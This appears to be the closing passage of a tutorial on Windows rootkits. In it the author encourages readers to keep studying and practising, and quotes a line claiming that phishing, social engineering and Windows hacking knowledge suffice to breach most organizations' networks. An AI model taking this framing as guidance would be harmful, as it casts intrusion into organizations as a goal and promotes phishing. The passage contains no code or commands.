That it for now, I’ll kill this here, If you’re still feeling a bit lost, don’t worry—that rootkit stuff can be pretty advanced. I suggest you keep learning and doing some research as you read. Don’t be afraid of the tricky parts! Explore different resources, try out some code, and remember that getting good at this takes time and practice,

and remember,

“Social engineering and phishing, combined with some operative knowledge about windows hacking, should be enough to get you inside the networks of most organization”

Source and Credits